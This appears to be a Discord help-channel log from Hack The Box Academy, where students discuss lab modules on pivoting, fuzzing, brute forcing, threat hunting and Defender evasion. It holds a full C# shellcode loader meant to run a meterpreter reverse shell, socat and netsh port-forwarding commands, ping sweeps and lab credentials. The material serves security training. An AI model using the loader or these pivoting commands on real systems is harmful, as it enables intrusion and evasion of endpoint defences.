#modules
Restart the scan, restart the machine, change VPN? It's the right command
Gotta love this response when spawning an instance
{ "success": 1, "ready": 0, "ip": null, "life_remaining": 119, "remaining_life_in_seconds": 7188 }
give me my IP
Okay, who broke it
I'll try again later
Me too
same thing here
yeah, stuck
I have downloaded the source code for CodeIgniter in the correct version and have been digging through the code, but still haven't found the right function
Module and Section: https://academy.hackthebox.com/module/158/section/1439
Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.
I'm able to transfer the binaries, but once I extract the contents of SocksOverRDP x64, the .dll file disappears shortly after. Please advise.
Hello, I'm studying web vulnerabilities but I'm not a native English speaker.
In "server side template injection", what does "template" refer to?
A - Injection in the template
B - Injection of template
?
In the template i think
@jovial sable thank you. The available translations in my native language are incorrect
Like you inject the code due to a vulnerability in how the template is made, usually with <%%> or ${{}}, if I'm not wrong
@jovial sable yes, that's correct. I used the attack in several jinja labs and I agree with you.
It's just that I'm taking notes, and I wanted to have the proper interpretation (the translation I have in my native language is a little bit misleading, it literally translates to "injection of template", hence my confusion)
oh, I understand. So yep, it has to be option A
@jovial sable I think you were right the first time, it makes more sense
(At least to me)
@jovial sable thanks a lot for your help
np : )
[CDSA][1 of 2] Intrusion Detection With Splunk (Real-world Scenario):
https://academy.hackthebox.com/module/218/section/2357
Hi guys/admins. I did some black box threat hunting and found some interesting stuff in the dataset for the said module that was not asked about in the module exercises, as well as other things that need to be verified, such as:
||After the credential dumping via comsvcs.dll's minidump function (2022-11-06 11:44:07) on host DESKTOP-EGSS5IS, the adversary proceeds to execute psexec related commands to enumerate the other host (10.0.0.47, DESKTOP-UN7T4R8): commands such as hostname, whoami or any generic situational awareness commands, as well as network enumeration ones (2022-11-06 11:57:27). Though I saw one command on 10.0.0.47 related to the commandline: net user waldo Password@123 (2022-11-06 11:12:32). What's not clear to me is the net user command; would it be right to assume that prior to the dumping at DESKTOP-EGSS5IS, waldo created the user waldo with password Password@123 via net user waldo Password@123, since this event took place before the dumping of credentials?
comsvcs.dll's minidump function (2022-11-06 11:44:07) on host DESKTOP-EGSS5IS
net user waldo Password@123 (2022-11-06 11:12:32) on host DESKTOP-UN7T4R8
[!] This ties in with the fact as well that after the credential dumping event there's one successful login event from DESKTOP-EGSS5IS for the user waldo against DESKTOP-UN7T4R8, but that is at 2022-11-06 11:59:59, which is normal given that credential dumping took place. But I still can't figure out how net user waldo Password@123 was executed on DESKTOP-UN7T4R8 when in fact the dumping took place after the net user related event?||
[CDSA][2 of 2] Intrusion Detection With Splunk (Real-world Scenario):
Hi guys/admins. I did some black box threat hunting and found some interesting stuff in the dataset for the said module that was not asked about in the module exercises, as well as other things that need to be verified, such as:
||2. As for other attacks, I've seen notepad.exe and cmd.exe were set up as a persistence mechanism, as initiated by randomfile.exe on host DESKTOP-EGSS5IS
cmd.exe and notepad.exe were used to escalate privilege from user waldo > NT AUTHORITY\SYSTEM upon their execution as a persistence mechanism on 2022-11-08
(Please confirm this finding)
3. I saw SharpHound.exe and file.exe being fetched by the adversary via PS' Invoke-WebRequest on DESKTOP-EGSS5IS. As for tools used against the domain and its users, as of now I don't see anything other than these 2 (Please confirm this finding)
4. Invoke-DCSync.ps1 was downloaded on DESKTOP-UN7T4R8. (Please confirm this finding)
5. Was able to see a DCSync attack related artifact via Windows Event ID 4662, user waldo being the culprit for that. Can you confirm if the domain controller is host WIN-HSRME76TRAD.uniwaldo.local? (Please confirm this finding)
6. Aside from SharpHound.exe being invoked on DESKTOP-EGSS5IS and Invoke-DCSync.ps1 invoked on DESKTOP-UN7T4R8, are there any other steps that I've missed or any major attacks against the DC? (Please confirm this finding)||
About the .dll "Defender may try to stand in your way"
Ohhhhh, so that's why it disappeared.
I didn't even end up using the technique, I just kept RDP'ing to the final host
Learning ligolo rn and then I'll try the lab's method and then with ligolo.
Well it's always good to know for the future: .dll/.exe that magically disappear = Defender/some kind of security measure, but probably Defender for a CTF
hey guys, I want to start Hack The Box Academy's SOC analyst job role path. How long does it take approximately in hours? It says 23 days there; does that mean 552 hours, or is it a module a day?
Login Brute Forcing > Skills Assessment - Service Login
I am having trouble with the first question, which asks me to use the information from the previous module to create a custom password wordlist that meets the password policy, use usernameGenerator to generate potential usernames, and then brute force the SSH server on the target host.
I have managed to narrow down the potential username to ||h.potter||, and the wordlist I created with cupp is failing to get a hit. I only used the first and last name to generate the password list (and allowed for special characters) but I'm not getting hits. Do I have the right username? If so, should I revisit my password list?
If you start with 0 experience it's usually (much) longer than the estimated time, but the theory is 1 day = 8 hours
thanks
Yeah, thanks for telling me, it hadn't even occurred to me. And the usual notification you get when it happens on a personal machine didn't show, so I never realized. Thanks!
@next bronze with ligolo or any tool, it's not possible to run an nmap -sS scan on a pivot, right?
ligolo can
Btw do you know how I can reset all the network routes and NICs that I've added?
u can manually delete them
or restart your host
Is there a way to know which were the default to begin with?
So I don't accidentally delete something I'm not supposed to?
I'm only familiar with ligolo, so if a route or interface was added, the name "ligolo" would be there
Alrighty
Ffuf assessment last question. I found the wordlist. Found values. Tried all of them, nothing worked, with curl -X POST.
https://academy.hackthebox.com/module/54/section/511
I've just learnt that listeners can be added to compromised hosts with listener_add, but how do we do it on Windows hosts?
That's managed through the ligolo console on your host in the session of the agent
Oh okay, noted.
Guess I should fire up ligolo and test it out instead of just reading. It'll give me a better idea.
box, you done the Ffuf assessment yet?
Yeah, but I don't remember what I did though
mind if I DM you what I tried?
ok
can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
the code below, when I paste in the shellcode, should make a reverse shell to the handler, right?
code:
using System;
using System.Linq;
using System.Runtime.InteropServices;

namespace NotMalware
{
    internal class Program
    {
        [DllImport("kernel32")]
        private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        static void Main(string[] args)
        {
            // Shellcode (msfvenom -p windows/x64/meterpreter/reverse_http LHOST=... LPORT=... -f csharp)
            byte[] buf = new byte[] {<SNIP>};

            // Allocate RW space for shellcode
            IntPtr lpStartAddress = VirtualAlloc(IntPtr.Zero, (UInt32)buf.Length, 0x1000, 0x04);

            // Copy shellcode into allocated space
            Marshal.Copy(buf, 0, lpStartAddress, buf.Length);

            // Make shellcode in memory executable
            UInt32 lpflOldProtect;
            VirtualProtect(lpStartAddress, (UInt32)buf.Length, 0x20, out lpflOldProtect);

            // Execute the shellcode in a new thread
            UInt32 lpThreadId = 0;
            IntPtr hThread = CreateThread(0, 0, lpStartAddress, IntPtr.Zero, 0, ref lpThreadId);

            // Wait until the shellcode is done executing
            WaitForSingleObject(hThread, 0xffffffff);
        }
    }
}
when there's no help in this forum, does anybody know where else to write?
you need to be patient young padawan
I was... but have been asking for some time...
are you able to help?
I don't get it.
C:\Tools\NotMalware\NotMalware\bin\Debug>.\NotMalware.exe
Shellcode allocated at: 2D60000
Shellcode copied to allocated space.
Shellcode memory protection set to executable.
Shellcode execution thread created.
time to break out the debugger
or add pauses in your program so that it can be examined
I did this with the statements above.
C:\Tools\NotMalware\NotMalware\bin\Debug>.\NotMalware.exe
Shellcode allocated at: 2D60000
Shellcode copied to allocated space.
Shellcode memory protection set to executable.
Shellcode execution thread created.
seems to work
@muted kindle If I've started an smb server on the attack host that I wish to access from PC-2, what listener on ligolo do I need to add to PC-1?
I've tried adding the following listener on PC-1, but couldn't access the smb share:
listener_add --addr 0.0.0.0:1234 --to 0.0.0.0:445
I don't think you can do it like that because Windows defaults to 445 for SMB
But doesn't the command I type mean that when I send the connection request to port 1234 via PC-1, it'll redirect it to port 445 on my attack host?
Yes
But accessing share on windows use 445 always
It'll be accessing the share of pc-1
Also, after I tried deleting the listener, this happened
Can I DM you what I did so far?
If you want to transfer files to pc2, set up a Python web server,
If you want to get files out setup uploadserver
The file transfer module teaches how to use
TE.CL section lab from HTTP Attacks module:
Could you give me any hint? What am I doing wrong?
So I need to transfer it to PC-1 first and then to the attack host? No direct method?
?
If you host uploadserver on port 8000 for example
You can add listener on pc1 for 8888 forward to you at 8000
Then on pc2 use curl or some script to upload the file to pc1:8888
Yeah, I understood that concept, and I tried applying the same logic to an SMB share, but you're saying something about windows using 445 by default that I don't get? I'm making the smb connection request to 1234 tho?
How do you get the UNC path to use 1234
If you can do that I'm not aware of it
UNC?
You want pc2 to reach your share yes? So it has to use \\yourIP\share
But how do you do that to use PC1 IP at port 1234
There are some direct methods, like
./socat TCP4-LISTEN:1234,fork TCP4:10.10.14.165:445 if PC1 is a linux machine
netsh.exe interface portproxy add v4tov4 listenport=1234 listenaddress=0.0.0.0 connectport=445 connectaddress=10.10.14.165 if PC1 is a windows machine
I didn't do it with ligolo-ng yet though
I was thinking something like \\PC-1_IP:1234\share, no?
Can u try it
I had to kill my ligolo session cuz of the error, I'll reconnect and try it and let you know.
doesn't work like that, windows will always go to 445 when pointed to a smb path
In my previous attempt I forgot the port.
not to mention that smb also needs 139 so you'll need to forward multiple ports
just use http/s
Oh okay.
But have I understood the port forwarding with ligolo correctly so far?
Yes
can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
I try to get the reverse shell as explained; the reverse shell works when I just use a normal .exe created with msfvenom, but when I use the C# code it doesn't work
Bump
where can I write for help if nobody here can help?
here
seems not to work
well, this is done by volunteering so it is not mandatory
I don't know
ok
@next bronze @muted kindle
I RDP'd to PC-2 (172.16.5.19) from PC-1 (172.16.5.150), but when I try to ping either of the IP addresses from PC-1, I get destination host unreachable. Also, I find the subnets a little weird?
I've already given some suggestions, if you want to do maldev, learn to debug your own program, you have the code and the binary
and I already replied to you, with:
I did this with the statements above.
C:\Tools\NotMalware\NotMalware\bin\Debug>.\NotMalware.exe
Shellcode allocated at: 2D60000
Shellcode copied to allocated space.
Shellcode memory protection set to executable.
Shellcode execution thread created.
seems to work
I'm telling you to debug it yourself, not me
Yes it should make a reverse shell via HTTP
I was pinging directly from PC-1's command prompt.
I'm pretty much following your write up, so I've just got the one tun interface you created at the start.
Have you placed any breakpoints?
Attached a debugger while it's running?
by sending me the debug output?
The pinging issue aside, I'm currently trying to double pivot, but I'm getting this error.
^ exactly what I said earlier
double pivot requires creating another device iirc
like ligolo2
then new route to ligolo2
start --tun ligolo2 for the agent
pc2 might be blocking ping, but if you can rdp from pc1 then there's a route there
or you can stop the first tunnel and start the second tunnel
Ahh ok. Can I also kill the first tunnel connection and use that tun interface? But I guess best practice would be to create a new tun interface like you said.
both will work
Okay, great. So it depends on my situation and need of retaining access to pc-1.
oh I didn't know that
exactly
it used to work like that until the recent multi tunnel update
Ah okay, it might be blocking ping since I couldn't ping even through my attack host. But what's with the IP addressing? How am I able to access the /23 IP on PC-2 from the /16 IP on PC-1?
pc1's got 2 interfaces, attach the second pivot to the interface that can reach pc2
Ah I didn't read entire history, my bad :D
I would suggest not using C# at all, but the course I did was all in C so I'm biased :D
Yeah, I got that.
I prefer C too but that module is done in C#
My current question lies with the IP addressing scheme.
fellow maldev academy enjoyer
am i tripping or is the loading icon not moving
Was it always like that?
oh it spawned
The second IP address on PC-1 has the IP address 172.16.5.150/16 and from there I was able to directly RDP to PC-2 on the IP 172.16.5.19/23, and then when I did ipconfig in the command prompt on PC-2, I found another interface with the IP 172.16.6.19/16.
yeah what about it? if you just want to reach pc2, you can ignore that interface
This is what doesn't make sense to me. I'm able to directly reach from PC-1's /16 subnet to PC-2's /23 subnet, and then the other interface on PC-2 is a /16 subnet that lets me pivot further.
PC-1/16 → PC-2/23?
whats wrong with that
I was expecting it to be PC-1/16 → PC-2/16, and then using the PC-2/23 subnet to pivot further.
Maybe I'm not understanding the networking here properly. I know there are overlapping host ranges between the two subnets, so why is it that I can't directly access the last host (PC-3), which has an IP address of 172.16.6.155, directly from PC-2 without having to double pivot?
that's not how subnetting works, the mask only determines the range of the subnet
go use a subnet calculator for the two subnets if you're confused
I understand the mask determines the range, but I calculated the range, and PC-3 should fall within the /16 subnet.
PC-3 falls within the Host range for both subnets.
whys there a pc3 now
I'm on the same double pivoting section This is the setup for a bird's eye view.
you can just assume that the routes between the pcs are by design, there can be firewall or routing configurations affecting things
I see. Hypothetically though, this question is just to confirm my networking knowledge, let's say the firewall or routing configurations weren't present, then PC-2 and PC-3 should be directly accessible from PC-1, yes?
I hadn't considered this, was racking my brain thinking I'd forgotten how basic networking worked. Thanks. My mind's been so focused on using ligolo to pivot, I missed considering it.
if it's just a direct connection, yeah
Alrighty, thanks a lot for bearing with me and my questions. I really appreciate it.
Btw if I stop the tunnel for my next pivot, won't it break the chain?
how many pivots are there now
yes I tried, and have sent the output before. I don't know...
Just the pivot on PC-1 that lets me access PC-2.
I now want to go from PC-2 to PC-3.
that's fine, the agent will still be connected even if you stop the tunnel
at least for double pivots
have you checked the allocated memory region to see if your shellcode was allocated correctly?
I am pretty sure something is wrong with Attacking Common Services -> Attacking FTP VM. It has been like 30 mins but the FTP service is still not ON. Where should I report this issue?
Oh, okay. wow.
So I'm guessing it ain't a feasible method for more than 2 pivots perhaps? In that case, what's best practice? To keep creating new tunnels and tun interfaces?
I don't remember the last time I've had to use more than 2 tunnels, but the multi tunnel feature will work for this
I just stopped my tunnel, and I lost my xfreerdp session to PC-2.
yeah if you stop the tunnel it will kill the connection to the hosts that are not the pivot
I'm talking about the agent itself that is still running, of course the tunnel is stopped
for me it seems to be okay?
Ah okay, so if the agent is still running, is there a method to reinitiate the tunnel?
check the memory region after you copy the shellcode into memory
just start it again 
Haha, alrighty.
@next bronze did you finish maldev?
yeah
ah nice, I didn't get far lol, had to pivot to web pentesting to fill in some knowledge
got to module 33
did it during my free time, tbh I haven't used any of the knowledge in my actual work and don't think I will anytime soon, but still a blast to learn nonetheless
did you get the lifetime sub
of course
What is the customized version of the POP3 server?
any hint to solve this?
Footprinting -> IMAP/POP3
that's why I'm not too fussed about finishing it ASAP
yeah then just take your time with it
are you compiling according to the instructions in the module?
hey hacker lets hack nasa
seems also to be okay, no?
I think so. Or what do you mean? I have not encrypted it, but I think I followed the module exactly up to the point in the section where he got the meterpreter session
use x64dbg to attach to the process and go to the allocated memory region and see if your shellcode is actually copied into the memory correctly
dope website dude, gonna give it a read
help!!!
your program is in the debug folder, idk if that will make a difference but follow exactly the requirements in the module
thank you sir 
if nothing else works use a debugger
I managed to do it. Thanks a lot for your help @next bronze 
What is the customized version of the POP3 server?
Help me with this
try using nmap scripting engine
oh my god. thank you!
it was set to x32
thanks also for your help, really appreciate it
Btw @next bronze when I stop a listener, I get this error. How do I stop it?
Hi guys, I'm in the module Linux Fundamentals. I installed OpenVPN and ran the Academy's VPN, but when I go to the target VM, I land on an Apache2 Ubuntu default page. What should I do to fix this? Thanks
correct port and web directory?
it seems correct, got Initialization Sequence Completed in terminal, ping looks good too
What section and question is this?
Linux Fundamentals - The Shell - System Information. I just can't connect to the target VM to answer the questions
Below the spawn target it says ssh with the given credentials
Remote login to the target with ssh
I have just finished the Linux Fundamentals section, if I wanted to run back through it again at a later date is it a case of just spawning a new target and rinse and repeat?
ah, I missed that part, thank you for the help
What is the admin email address?
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
Help me solve this
how should I do this?
If you read emails you can get email addresses
Log into the imap service with your known user, and read their emails
I can't find the email address, which command should I use? give me a hint
You should be fetching the body of the email
Still currently stuck on this if anyone is able to provide any insight. Mainly just wanting to know if im on the right track and just need to be patient or if i've fucked up somewhere in the process. I'm struggling to troubleshoot this myself.
I suggest looking up imap commands, I've linked to a few articles in the past
can you pin me out on that
web assessment final question. A small nudge pls?
I have found a short username wordlist from SecLists
I have found the parameters
I have tried all usernames but I only get "method no longer used", and with one combo I tried outside of that wordlist, "you don't have access"
@fathom pendant can you help me find how to find an inverse wifi compatibility?
should I post the commands I've used here?
and why is my handle still unverified? should I contact support?
Invalid method means the parameter isn't correct iirc
Read and follow #welcome
my bad.. thx
just verified, it said verification error contact online mod for help?
yes, I have found both parameters that don't need another username as value, I'm assuming, so the wordlist is where I'm having an issue. I have the parameters. I can't find the right wordlist to fuzz the other value to gain the flag with curl. Either that or I'm not understanding something.
You're not understanding something
You need to find a proper parameter (there will only be one) and then fuzz the value
i found it
this user does not have access
error is what i get, so im assuming the user exists
Well, keep trying until you get a user that does
it's not the pass?
I've tried the whole wordlist mentioned on the forum website on both parameters
To be clear: you're doing the attacking web applications with ffuf module?
Yep you get 2 parameters
Because you already linked your acc to your alt discord probably
Module: Broken Authentication
Section: Skill Assessment
Hey in the module broken authentication how can you tell how many digits the OTP has in the skill assessment? I can't find it anywhere on the page and I tried 4,5, and 6 digits.
thank you kindly
And fuzzing the value with a namelist will get you something @cloud wigeon
You should use the namelist that's highlighted throughout the module
?parameter=FUZZ and -X POST ..
yes
encapsulated by single quotes
don't want to copy paste the whole cmd as a spoiler
Then why are you adding ?parameter
Crackmapexec - skills assessment
I am stuck at question 5. Can someone please write to me and give me some tips on how to complete the module?
What is the host discovery command y'all prefer to use?
I'm currently trying to perform host discovery to hunt for something I could pivot to using this command:
sudo nmap -sn <ip_addr/CIDR>
That search bar is so helpful thanks mentioning it the other day
Sometimes I forget it exists, thanks
haha ya I thought a while back why would someone need that, and now I'm thinking how much data is stored on this discord
Can I do write-ups for HTB Academy modules now that the write-ups are accessible on-site when paid?
I think u can make write ups for tier 0.
How do y'all perform host discovery on a subnet that blocks ping?
That means ICMP Echo Ping is disabled, right? So doesn't it result in using ARP ping?
I am running into the same issue. I can evade Defender and YARA. My payload works when launched from the command line in EVASION-TARGET, but it does not work when launched automatically. Could someone help me shed some light here? Thanks.
you can do -sS for SYN scan
So this?
nmap -sS -Pn <ip_addr>
I made a mistake, remove -Pn
I'm doing "LINUX PRIVILEGE ESCALATION" / "Linux Services & Internals Enumeration". For the question at the end of the module about the latest version of Python on the box, what do they actually want as the answer? There are several Python binaries, but nothing matches.
that scan will take forever though
ideally if you're in an AD environment you want to find the domain controller and some valid credentials
then use adidnsdump to find all the hosts in the network
can someone tell me why I can't connect to the attack VM (ACADEMY-EA-ATTACK01) for this section? https://academy.hackthebox.com/module/143/section/1275
I can't log in to my HTB account, and when I try to reset my password nothing is sent to my email. Where do I get assistance with this issue? : )
No
the chat bot doesn't work
Give it a minute
It's not like there's thousands of support agents waiting for a chat
It's not uncommon to need to wait a handful of minutes to an hour before getting a response, as they may be responding to another support request
how do you get scriptkiddie/hacker rank btw
By advancing on the main website, doing active boxes
how are you on the same rank as me, I'm dogshit compared to you cuh
Because I don't do main platform content atm
what sort of cyber activities you smokin on?
None, just got a lot going on
Hi, I'm reading the 'Host and Port Scanning' section of the nmap module and it says this about TCP Connect scans:
It is also useful when the target host has a personal firewall that drops incoming packets but allows outgoing packets. In this case, a Connect scan can bypass the firewall and accurately determine the state of the target ports.
I don't understand why this scan would bypass a target's firewall that drops incoming packets. Wouldn't the initial SYN packet from nmap just get dropped?
Hi. I am not sure if this is the right place to ask, but does anyone know if it is possible to "return" a subscription? I accidentally pressed purchase on the Silver subscription, which was surprisingly easy to accidentally purchase. I have not yet accessed any modules that I didn't already purchase with cubes beforehand. (Also I JUST purchased it like 15 minutes ago, so it is quite recent)
Message support
How do I know where the flag.txt file was downloaded
It's not something that can be taken care of via discord
It's your current directory you launched ftp from
thx
how do I get the script kiddie rank ?
By leveling up in the main site
As I said earlier, rank isn't tied to academy progress
ye I'm doing these starting machine labs but they don't seem to gimme points
Because they have to be active. Starting point isn't "active" machines, and since they have writeups as well - they also don't contribute
ahh ok
command injection skill assessment, can I get some help?
I found the injection point and bypassed many filters but I still get "malicious request detected"
has anyone ever tried to read the flag with PowerUpSQL? I succeeded with mssqlclient.py but I'm trying to find a way to display the flag with a system command. https://academy.hackthebox.com/module/143/section/1275
Use sudo
my kali crashed when I tried opening the file lol
Well, because it's a big wordlist
If you don't have enough storage space then your system isn't gonna like it
Any way to get free cubes?
complete modules
and u can invite people apparently but it didn't work for me
invited my brother and it never gave me any cubes
even though he signed up
through my link
But unlocking modules needs cubes
you will get the cube if your referral buys certain plans/subscription
Hello, can anyone explain to me where Kira's "cracked password" is, or what they mean by that? https://academy.hackthebox.com/module/147/section/1322 I did all the past modules but didn't save any of the passwords. Should I check them again, or do I need to do something else?
Always keep passwords that you've cracked, they very likely will come in handy as you progress through a module
Unless you have Kira's password that you cracked saved somewhere, you'll need to go ahead and get it again
Alright, thanks, I will do it.
No
It's a low %
anyone ?
MODULE: Advanced SQL Injection
SECTION: Common Character Bypass
URL: https://academy.hackthebox.com/module/188/section/1997
Are we meant to know a set of valid credentials to login with to the application? To my knowledge, the /find-user endpoint is only reachable if you are already logged-in.
EDIT (solved): You can create your own account.
I did try to ask earlier, but it got missed in the feed... If you complete a module can you go back and run through the practical elements as much as you like? just doing my CREST path so lots of content to consume. Thanks
idk any of these channels so I'm just gonna type here
is the academy just text based or does it have videos where they're explained?
Text based as far as I've seen, but every module has lots of practical labs.
After launching a Win machine in the course, roughly how long does it take to be able to RDP into it? Some communities can be up to like 5 minutes?
No videos, but there are practical labs
I've never had to wait more than a couple of minutes, but obviously sometimes there's some latency; switching VPN servers seems to help
Usually 5-10 minutes is the safe bet
ah ok thanks
I will say any win machine with internal machines that you need to pivot into, those take a while from my experience
I found the interface pretty friendly so I'll stick with it this time
You can likely find video guides on the tier 0 content
But tier 1+ videos aren't allowed
do certifications cost money?
Yes
so
thanks very much, and can I run back through the practical content as much as I like? thanks, just trying to plan my study
Any cert that holds value will cost some amount of money
to say I completed this I need to pay 400 dollars?
Yes
thank you
yay I finished the intro
No. You can complete a job role path without taking the certification exam
lol
what
The cert isn't just "oh I completed the path" it's, "I took an exam that proves my competency in the exam material, and can write a professional report"
sorry, can you explain it to me like I'm a caveman that just found out about fire
The path is a requirement to be able to take the exam in the first place
Pentester path for CPTS, Bug Bounty Hunter for CBBH, SOC analyst for CDSA, Senior Web Pentester for CWEE
They are all pinned in their respective channels
bro you sound so professional rn and I'm scared of making you mad
There's no "lol you completed this, here's a cert" kinda thing
It's a full exam to be able to get the cert, like OSCP
but, I don't know crap about this stuff, that's why I'm learning, I just know how to code a discord bot in python, nothing more
Yep and that's why you can't take the respective exams without first completing the required path
idk what these oscp, cpts, or whatever they are
amazing
OSCP is the industry standard pentest cert, CPTS is HTB's competitor cert to it
ohh
Your resume isn't even likely to get looked at if you don't have it (for Jr pentest position)
wait there's jobs for this
Yes, penetration testing is a legit job
holy crap this is awesome
It's hard as fuck to get your foot in the door though
although that name is kind of... suspicious someone could mistake it for something else
Most people start SOC (Security Operation Center) and pivot to it
There's companies that do this, there's contracts and such for it
They are well defined and scoped
well that's where the ethical side of ethical hacking comes in ¯\_(ツ)_/¯
Most people just do public bug bounties, as they can be done by anyone with the skills
i figured out how to use sqlmap and now i can just screenshot it and scare some 5 year olds or some crap, i sent a screenshot of 2 game hacking apps from my phone to my friend, dude sent a voice memo screaming im calling the police if you dare
Meh
yeah meh truly
i got scared for my sake cause he's that stupid he'd actually call them i swear
As long as you aren't doing anything illegal, you're fine
Decompiling a game isn't necessarily illegal, unless the company clearly states so in its ToS
yeah uhh
it was basically for getting modded games or paid games for free, happymod but looked more professional ig, i might learn how to use cheat engine
Attacking live sites that don't have a bug bounty program, however, I'd advise against it
I suggest refraining from talking about cracking games
can i attack my own sites?
ohh mb mb
Yes, they're yours
would i get in any trouble with the hosting provider or something
Most hosting sites pass the testing onto the customer
ah ok
thanks for explaining all this to me btw
I suggest looking into ToS if you're unsure
yeah but sites be making that crap long on purpose so you can't read it, roblox literally said it does that
Skill Issue then
fair
Responsibly, any services you pay for, you should read the ToS
As EULAs and ToS are legally binding contracts
yeah i never pay for anything online i always gotta find a free alternative
bro pls stop you're making me anxious
Well downloading cracks is an easy way to get your computer infected
only thing legally related i did was add privacy policy and tos to my shopify store, and that thing tired me tf out let alone all these other things
huh, im talking about for example shopify is paid, i find something thats free
We're driving way off topic now
oh yeah i forgot sorry
oh
they should have put it in verify or something ive been searching this entire time lmao ty im stupid
just my two cents: the information in these courses will give you the ability to do many things; it's a question of your ethics and morals as to what you do with it, hence you have white hats and black hats. Much like anything, you can either use it for good or bad; either way you still have to learn how to use it
HTB spins it in a professional way, the modules and labs are framed in a way that you and imaginary colleagues were contracted to test the fictional company InlaneFreight
i just want to state this incase anyone i know is reading this, i dont know what any of this is dont talk to me about it cause i swear i dont know either
yeah that looks more suspicious doesnt it
No one knows shit about fuck my guy
respect
Things evolve and change every day
i feel like the kid eating at the adults table rn
HTB strives to build a strong foundation for you to further research and expand on
And as per one of the big guys G0blin, they are planning to keep things as reasonably affordable as possible
I was always taught to be the dumbest person in a room its how you learn most, I am on a learning path like the rest of us. just asking the right questions helps
idk man, ive been the dumbest for 9 years now and i think i need to repeat primary school
My best advice, take notes, create your own personal grimoire of tricks and links
and my username is true btw, idk why they think that
The best notes are ones that you understand
i just know english and can read the settings in a device and suddenly im a hacking prodigy
yeah ill keep that in mind
Copy/pasting only gets you so far if you don't understand
learned that the hard way actually when i lost all the code to my discord bot, im in pain now cause i cant rewrite it like how i used chatgpt when i started
If you don't know why you use a tool, then you don't understand what to do when faced with an unfamiliar situation
chatGPT can be used as a tool for understanding, however, don't let it replace your actual brain
We will make fun of you for it lol
@fathom pendant how big is your forehead
and I shall accept it with grace
Irrelevant
was calling you smart but ok
Either way. Take notes, if it seems important -- write it down
A lot of basic modules will break commands down
No
ill be checking in here more, i like this server
im getting a job
Tier 1+ modules only refund 20% and you never go positive by just doing modules
You can also message support regarding getting the academic discount
$8/month
Gl
Module: Login Brute Forcing > Skills Assessment - Service Login
I am having trouble with the first question, which asks me to use the information from the previous module to create a custom password wordlist that meets password policy and use usernameGenerator to generate potential usernames, then brute force the SSH server on the target host.
I have managed to narrow down the potential username to ||h.potter|| and the wordlist I created with cupp is failing to get a hit. I only used the first and last name to generate the password list (and allowed for special characters) but I'm not getting hits. Do I have the right username? Am I on the right track or have I made a mistake here?
How to set white background for academy modules ?
there's probably some theme addon out there for something like that
in chrome ?
or firefox ?
idk, search for either one you use
you can also manually edit the css style sheet maybe
why would you want to blind yourself though lol
ah.... found something.
Just transitioning habits
Just finished the footprinting module, the medium and hard test boxes are no joke. Medium took longer than hard
The irony 
haha
Some people have vision issues and dark background actually makes it harder to read
probably have vision issues from using white backgrounds their whole life
Or other vision acuity issues
Hello, for INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC (Hunting for Stuxbot)
https://academy.hackthebox.com/module/214/section/2285
Can someone from the admins confirm if an AMSIBypass took place for the following screenshot:
As analyzing the related Windows Event Code 4104 for this, which involves shellcode, has a resemblance with the known AMSIBypass from @am0nsec
I'm trying to download a file to get a flag but I can't figure it out, can anyone help?
What module are you working on
You need to give us enough info to be able to help you
Module name; section name; what's causing you trouble
hey, i have almost completed cpts 85%, now i was thinking, is the defense part going to be ez or does it not matter
Was there in depth evasion tactics in the course? No
You'll only encounter on the exam what you encounter in the path
beside cpts which path u follow marcie
I haven't finished the path yet and don't plan on doing anything extra
Anyone else having issues spawning targets again? Module : blind sql injections. Section: skill assessment
Been waiting for 6 minutes now
try changing servers
It won't stop the spawning it seems. Just killed the pwnbox
huh? refresh the page and it will let you spawn again
It didn't. There we go, after 9 minutes
Finally. Maybe the lab is that big
Working now. This is gonna be a fun one
Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: Skills Assessment
I'm currently struggling with discovering hosts from my double pivot.
I've already done the setup in ligolo for Pivot02, but I'm not sure if it's correct. It wouldn't let me add the route 172.16.0.0/16 for ligolo2 as well, so I added the route 172.16.6.0/24 instead.
After doing this, I tried a ping sweep on 172.16.6.0/24 and it returned a bunch of hosts. I used this command for the ping sweep:
for i in {1..254} ;do (ping -c 1 172.16.6.$i | grep "bytes from" &) ;done
Now I don't know which host to proceed with.
Tried to perform a ping sweep from Pivot02 itself, resulted in nothing. This was the command:
for /L %i in (1 1 254) do ping 172.16.6.%i -n 1 -w 100 | find "Reply"
well ive finished the introduction finally
but
i still cant unlock the introduction to bash scripting because i have no cubes 
Module: ADCS attacks
Section: Skills assessment
To get initial access to DEV01, I tried to use ESC8 but the coerce failed (using coercer or petitpotam.py). Can someone give me a hint? thanks
Hi all!
I am on the Pivoting Module Skill assessment and I already compromised the windows host through the webserver. I noticed that there is another subnet and performed a ping sweep, but I am unable to perform an nmap scan to this network. I am unsure on how to make this double pivot to my attack host. Can anyone help me on this?
Ty in advance!!
hmmmm
can't get the output i need
"Obtaining the KRBTGT Account's NT Hash using Mimikatz", "Attacking Domain Trusts - Child -> Parent Trusts - from Windows"
hello amigos. I hope everybody is having an amazing Friday - weekend almost here. I have a minor question on the SSRF module at the blind SSRF question. This time we are required to only encode our python web shell 2 times rather than 3 times, which was the case in the SSRF example. The server structure to my knowledge is the same as the SSRF example. Why do we encode only 2 times this time?
wat user r u
.
is it a domain user?
The getncchanges error means ur user doesn't have replication rights
User must be local admin on DC or a domain admin
so using mimikatz by admin access help this , right?
let me try this
it worked
guys I can't understand why every lab I'm trying to solve seems buggy on htb
Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)
I'm trying to solve this lab, and even used "sudo nmap <ip> -sC -sV -p3306 --script mysql*" to know the version
But it doesnt show me the version
help!!
If you think you have issues with the labs, did you try to reach out to support to verify that
yes i did messaged but still no reply!
